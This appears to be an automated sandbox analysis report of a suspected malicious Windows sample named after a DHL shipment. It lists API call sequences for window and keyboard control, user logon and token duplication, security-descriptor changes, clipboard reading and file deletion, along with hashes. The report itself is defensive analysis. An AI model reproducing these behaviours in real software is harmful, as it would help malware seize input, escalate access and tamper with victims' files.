• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008B99D6
• ReleaseCapture.USER32 ref: 008B99E1
• GetCursorPos.USER32(?), ref: 008B9A19
• ScreenToClient.USER32(?,?), ref: 008B9A26
• SendMessageW.USER32(?,00001012,00000000,?), ref: 008B9A80
• SendMessageW.USER32 ref: 008B9AAE
• SendMessageW.USER32(?,00001111,00000000,?), ref: 008B9AEB
• SendMessageW.USER32 ref: 008B9B1A
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 008B9B3B
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 008B9B4A
• GetCursorPos.USER32(?), ref: 008B9B68
• ScreenToClient.USER32(?,?), ref: 008B9B75
• GetParent.USER32(?), ref: 008B9B93
• SendMessageW.USER32(?,00001012,00000000,?), ref: 008B9BFA
• SendMessageW.USER32 ref: 008B9C2B
• ClientToScreen.USER32(?,?), ref: 008B9C84
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 008B9CB4
• SendMessageW.USER32(?,00001111,00000000,?), ref: 008B9CDE
• SendMessageW.USER32 ref: 008B9D01
• ClientToScreen.USER32(?,?), ref: 008B9D4E
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 008B9D82
  • Part of subcall function 00839944: GetWindowLongW.USER32(?,000000EB), ref: 00839952
• GetWindowLongW.USER32(?,000000F0), ref: 008B9E05
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
• String ID: @GUI_DRAGID$F
• API String ID: 3429851547-4164748364
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 008B48F3
                                                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 008B4908
                                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 008B4927
                                                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 008B494B
                                                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 008B495C
                                                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 008B497B
                                                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 008B49AE
                                                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 008B49D4
                                                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 008B4A0F
                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 008B4A56
                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 008B4A7E
                                                                                            • IsMenu.USER32(?), ref: 008B4A97
                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008B4AF2
                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008B4B20
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B4B94
                                                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 008B4BE3
                                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 008B4C82
                                                                                            • wsprintfW.USER32 ref: 008B4CAE
                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008B4CC9
                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 008B4CF1
                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008B4D13
                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008B4D33
                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 008B4D5A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                            • String ID: %d/%02d/%02d
                                                                                            • API String ID: 4054740463-328681919
                                                                                            • Opcode ID: 7be73e5622b86881cfa46bc341deab1aefccb8e24684315023e999abfb425c26
                                                                                            • Instruction ID: 3b3ea949df800d3105a5714dff7b426e4d977e2f1e721800dbabaa0c008b754c
                                                                                            • Opcode Fuzzy Hash: 7be73e5622b86881cfa46bc341deab1aefccb8e24684315023e999abfb425c26
                                                                                            • Instruction Fuzzy Hash: D212AD71600218ABEB258F28CC4AFEE7BB8FF45714F145229F516EB3A2DB749941CB50
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0083F998
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0087F474
                                                                                            • IsIconic.USER32(00000000), ref: 0087F47D
                                                                                            • ShowWindow.USER32(00000000,00000009), ref: 0087F48A
                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0087F494
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0087F4AA
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0087F4B1
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0087F4BD
                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0087F4CE
                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0087F4D6
                                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0087F4DE
                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0087F4E1
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087F4F6
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0087F501
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087F50B
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0087F510
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087F519
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0087F51E
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087F528
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0087F52D
                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0087F530
                                                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0087F557
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 4125248594-2988720461
                                                                                            • Opcode ID: a97e884daa9662ece3f0805210f1172bfb82c32e7c0d24e9fa7bab8eff367538
                                                                                            • Instruction ID: 1da6e9908919e995b36a0dba99394482292bbd4c1c318fd67631d38d43497f91
                                                                                            • Opcode Fuzzy Hash: a97e884daa9662ece3f0805210f1172bfb82c32e7c0d24e9fa7bab8eff367538
                                                                                            • Instruction Fuzzy Hash: 90317471A40218BBEB206FB69C4AFBF7F6CFB45B50F104165FB05E61D1C6B19D00AAA0
                                                                                            APIs
                                                                                              • Part of subcall function 008816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0088170D
                                                                                              • Part of subcall function 008816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0088173A
                                                                                              • Part of subcall function 008816C3: GetLastError.KERNEL32 ref: 0088174A
                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00881286
                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008812A8
                                                                                            • CloseHandle.KERNEL32(?), ref: 008812B9
                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008812D1
                                                                                            • GetProcessWindowStation.USER32 ref: 008812EA
                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 008812F4
                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00881310
                                                                                              • Part of subcall function 008810BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008811FC), ref: 008810D4
                                                                                              • Part of subcall function 008810BF: CloseHandle.KERNEL32(?,?,008811FC), ref: 008810E9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                            • String ID: $default$winsta0
                                                                                            • API String ID: 22674027-1027155976
                                                                                            • Opcode ID: 5825ac0912981789a16a6a706546c490e89043df9b900d42d4ed0fa0a0fd0a1f
                                                                                            • Instruction ID: 385a4451fa391cffeb13ac6ad5cdc71fe10c041451588daf4e1cdfebe5362f92
                                                                                            • Opcode Fuzzy Hash: 5825ac0912981789a16a6a706546c490e89043df9b900d42d4ed0fa0a0fd0a1f
                                                                                            • Instruction Fuzzy Hash: ED818D71900209ABDF21AFA8DC49FEE7BBEFF04704F144129F911E62A0DB359946CB65
                                                                                            APIs
                                                                                              • Part of subcall function 008810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00881114
                                                                                              • Part of subcall function 008810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881120
                                                                                              • Part of subcall function 008810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 0088112F
                                                                                              • Part of subcall function 008810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881136
                                                                                              • Part of subcall function 008810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0088114D
                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00880BCC
                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00880C00
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00880C17
                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00880C51
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00880C6D
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00880C84
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00880C8C
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00880C93
                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00880CB4
                                                                                            • CopySid.ADVAPI32(00000000), ref: 00880CBB
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00880CEA
                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00880D0C
                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00880D1E
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880D45
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880D4C
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880D55
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880D5C
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880D65
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880D6C
                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00880D78
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880D7F
                                                                                              • Part of subcall function 00881193: GetProcessHeap.KERNEL32(00000008,00880BB1,?,00000000,?,00880BB1,?), ref: 008811A1
                                                                                              • Part of subcall function 00881193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00880BB1,?), ref: 008811A8
                                                                                              • Part of subcall function 00881193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00880BB1,?), ref: 008811B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                            • String ID:
                                                                                            • API String ID: 4175595110-0
                                                                                            • Opcode ID: 101483eaeacb677bc808aa82dc23880dea0d8eb53cc9acbaaf6a601e253f09f5
                                                                                            • Instruction ID: 76649905093c2d05268161b6cdf21d672f55b3432b01acf2f5a3e3926e694330
                                                                                            • Opcode Fuzzy Hash: 101483eaeacb677bc808aa82dc23880dea0d8eb53cc9acbaaf6a601e253f09f5
                                                                                            • Instruction Fuzzy Hash: B7715A7290020AAFEF50EFA4DC48BAEBBB9FF04300F144615E914E7191D775A909CF60
                                                                                            APIs
                                                                                            • OpenClipboard.USER32(008BCC08), ref: 0089EB29
                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0089EB37
                                                                                            • GetClipboardData.USER32(0000000D), ref: 0089EB43
                                                                                            • CloseClipboard.USER32 ref: 0089EB4F
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0089EB87
                                                                                            • CloseClipboard.USER32 ref: 0089EB91
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0089EBBC
                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0089EBC9
                                                                                            • GetClipboardData.USER32(00000001), ref: 0089EBD1
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0089EBE2
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0089EC22
                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 0089EC38
                                                                                            • GetClipboardData.USER32(0000000F), ref: 0089EC44
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0089EC55
                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0089EC77
                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0089EC94
                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0089ECD2
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0089ECF3
                                                                                            • CountClipboardFormats.USER32 ref: 0089ED14
                                                                                            • CloseClipboard.USER32 ref: 0089ED59
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                            • String ID:
                                                                                            • API String ID: 420908878-0
                                                                                            • Opcode ID: 9167f6fb75c1da7e4e8ae60a1d939f78fd0983ddf6cf4c5992625dc64d1fa2b8
                                                                                            • Instruction ID: ca9cc4fad58a85c9f211bdf5ca0a6158a22f78a424363adec36988857cc9ddfa
                                                                                            • Opcode Fuzzy Hash: 9167f6fb75c1da7e4e8ae60a1d939f78fd0983ddf6cf4c5992625dc64d1fa2b8
                                                                                            • Instruction Fuzzy Hash: FF61D034204206AFDB10EF28D889F2A7BA4FF85714F18461DF496D72A2DB31DD45CB62
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 008969BE
                                                                                            • FindClose.KERNEL32(00000000), ref: 00896A12
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00896A4E
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00896A75
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00896AB2
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00896ADF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                            • API String ID: 3830820486-3289030164
                                                                                            • Opcode ID: 6332b3cd921094faa049cdc90aab302c2201a2ac293475dbd35213dcceb523e1
                                                                                            • Instruction ID: 4940ea6ed802f6247f7bf641e16c8c194eec9f3c4372e37fe0fa4b8dd4123f17
                                                                                            • Opcode Fuzzy Hash: 6332b3cd921094faa049cdc90aab302c2201a2ac293475dbd35213dcceb523e1
                                                                                            • Instruction Fuzzy Hash: 26D14DB2508350AFC710EBA4D991EAFB7E8FF88704F444919F585C6191EB74DA48CBA3
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00899663
• GetFileAttributesW.KERNEL32(?), ref: 008996A1
• SetFileAttributesW.KERNEL32(?,?), ref: 008996BB
• FindNextFileW.KERNEL32(00000000,?), ref: 008996D3
• FindClose.KERNEL32(00000000), ref: 008996DE
• FindFirstFileW.KERNEL32(*.*,?), ref: 008996FA
• SetCurrentDirectoryW.KERNEL32(?), ref: 0089974A
• SetCurrentDirectoryW.KERNEL32(008E6B7C), ref: 00899768
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00899772
• FindClose.KERNEL32(00000000), ref: 0089977F
• FindClose.KERNEL32(00000000), ref: 0089978F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 2014752018844aa74a0073bc4c93e2256e8977af82c978905c43bd50c17c9e6e
• Instruction ID: 34a4b57bd3cc5330bec5a4cfbb26915297902e7bc70e59770fdd9a2b2f84abfe
• Opcode Fuzzy Hash: 2014752018844aa74a0073bc4c93e2256e8977af82c978905c43bd50c17c9e6e
• Instruction Fuzzy Hash: E131C2325012197FDF14AFF9DC48ADE77ACFF49320F18425AF855E21A0EB75D9448A20
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 008997BE
• FindNextFileW.KERNEL32(00000000,?), ref: 00899819
• FindClose.KERNEL32(00000000), ref: 00899824
• FindFirstFileW.KERNEL32(*.*,?), ref: 00899840
• SetCurrentDirectoryW.KERNEL32(?), ref: 00899890
• SetCurrentDirectoryW.KERNEL32(008E6B7C), ref: 008998AE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 008998B8
• FindClose.KERNEL32(00000000), ref: 008998C5
• FindClose.KERNEL32(00000000), ref: 008998D5
  • Part of subcall function 0088DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0088DB00
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 275f7243ffb144b0537ed7b2d36fbce0de94a86c8179c6003239e41f8eb5aeb0
• Instruction ID: c04d9f24304a520a394a41e1d7f90d0bc1d7af06fb1221c22d4e881ceb03f868
• Opcode Fuzzy Hash: 275f7243ffb144b0537ed7b2d36fbce0de94a86c8179c6003239e41f8eb5aeb0
• Instruction Fuzzy Hash: 4131A53150061D6BDF10BFB9DC48ADE77ACFF4A320F18416EE894F21A1EB75D9448A60
APIs
• GetLocalTime.KERNEL32(?), ref: 00898257
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00898267
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00898273
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00898310
• SetCurrentDirectoryW.KERNEL32(?), ref: 00898324
• SetCurrentDirectoryW.KERNEL32(?), ref: 00898356
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0089838C
• SetCurrentDirectoryW.KERNEL32(?), ref: 00898395
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
• Opcode ID: a2a4fc1bb600e5d78378da9dbced25b4fc1e475e84e44f9af2f8701e4be89f71
• Instruction ID: 3b8fd7dd40577fc91c7f8f3f837e6ac0cdea42a19ffea6c23931e7b39e6ccdb7
• Opcode Fuzzy Hash: a2a4fc1bb600e5d78378da9dbced25b4fc1e475e84e44f9af2f8701e4be89f71
• Instruction Fuzzy Hash: 89616B725043169FCB10EF64D8449AEB3E8FF89314F08892EF999D7251DB31E945CB92
APIs
  • Part of subcall function 00823AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00823A97,?,?,00822E7F,?,?,?,00000000), ref: 00823AC2
  • Part of subcall function 0088E199: GetFileAttributesW.KERNEL32(?,0088CF95), ref: 0088E19A
• FindFirstFileW.KERNEL32(?,?), ref: 0088D122
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0088D1DD
• MoveFileW.KERNEL32(?,?), ref: 0088D1F0
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0088D20D
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0088D237
  • Part of subcall function 0088D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0088D21C,?,?), ref: 0088D2B2
• FindClose.KERNEL32(00000000,?,?,?), ref: 0088D253
• FindClose.KERNEL32(00000000), ref: 0088D264
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
• Opcode ID: 2b3f937f3f79967fba705623bf52cafeb458330b3eaa480255ed1ffc2da5f22e
• Instruction ID: 800facd3e280ca640b3f961df66e89973cde6206f63d52bba7fe5e84576f04d4
• Opcode Fuzzy Hash: 2b3f937f3f79967fba705623bf52cafeb458330b3eaa480255ed1ffc2da5f22e
• Instruction Fuzzy Hash: 7A61273180121DAACF05FBA4E9929EDB7B9FF55300F244165E442B7191EB30AF49CB62
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
